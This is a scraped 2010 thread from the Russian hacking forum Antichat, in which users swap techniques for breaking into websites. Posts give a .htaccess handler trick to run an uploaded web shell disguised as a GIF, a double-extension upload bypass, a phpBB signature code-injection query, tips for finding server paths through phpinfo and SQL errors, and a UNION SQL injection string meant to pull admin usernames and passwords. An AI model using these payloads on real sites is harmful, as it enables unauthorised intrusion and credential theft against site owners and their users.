Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
12.06.2010, 14:12
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
пиши в файл .htaccess:
AddHandler application/x-httpd-php .gif
потом заливай свой шелл изменив расширение на gif
|
|
|
12.06.2010, 14:13
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
phpinfo можно поискать на сервере, ибо некоторые админы его туда зачем то пихают!
через sql можно узнать в том случае если админ не отключил показ ошибок... тогда и покажет дерректорию!
|
|
|
|
12.06.2010, 14:18
|
|
Познающий
Регистрация: 23.12.2008
Сообщений: 81
Провел на форуме:
460763
Репутация:
97
|
|
Ну вот пример для phpbb
Код:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2;
так нельзя сделать?
пиши в файл .htaccess: AddHandler application/x-httpd-php .gif потом заливай свой шелл изменив расширение на gif
а .htaccess как залить?
|
|
|
|
12.06.2010, 14:19
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
I love this game я же тебе дал рабочий за запрос...
и для phpbb это не подайдет совсем!!!
|
|
|
|
12.06.2010, 14:21
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
ну если .htaccess не заливается то пиццец этому способу
|
|
|
|
12.06.2010, 14:21
|
|
Познающий
Регистрация: 23.12.2008
Сообщений: 81
Провел на форуме:
460763
Репутация:
97
|
|
я понял, что мне не поможет от phpbb я просто пример привел, но у ведь путей не знаю, ошибки не показывают!
|
|
|
|
12.06.2010, 14:26
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
pinch ну это не сильно распространенный способ!
I love this game попробуй поискать на сервере рhpinfо.php или что то подобное,
а так же советую пошарить на других сайтах этого сервера!
И попробуй переименовать шел в shell.php$20.gif и залить это, может прокатить!
|
|
|
|
12.06.2010, 14:30
|
|
Познающий
Регистрация: 23.12.2008
Сообщений: 81
Провел на форуме:
460763
Репутация:
97
|
|
Только jpg, но там еще стоит ограничение на размер и вроде переименовывает файл само!
не получлилось
Последний раз редактировалось I love this game; 12.06.2010 в 14:37..
|
|
|
|
12.06.2010, 20:18
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Вопрос! Можно ли вывести из таблицы ADMIN, через information_schema, значения колонок USERNAME,PASSWORD?
id=-11'+union+select+1,concat_ws(0x3a,USERNAME,PASSWOR D),3,4,5,6,7,8,9,10,11,12+from+information_schema. tables+where+table_name=0x41444d494e+--+
|
|
|
|
12.06.2010, 20:28
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Вопрос! Можно ли вывести из таблицы ADMIN, через information_schema, значения колонок USERNAME,PASSWORD?
id=-11'+union+select+1,concat_ws(0x3a,USERNAME,PASSWOR D),3,4,5,6,7,8,9,10,11,12+from+information_schema. tables+where+table_name=0x41444d494e+--+
Хм.. Странный вопрос. Наверное можно, если там есть такие колонки.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
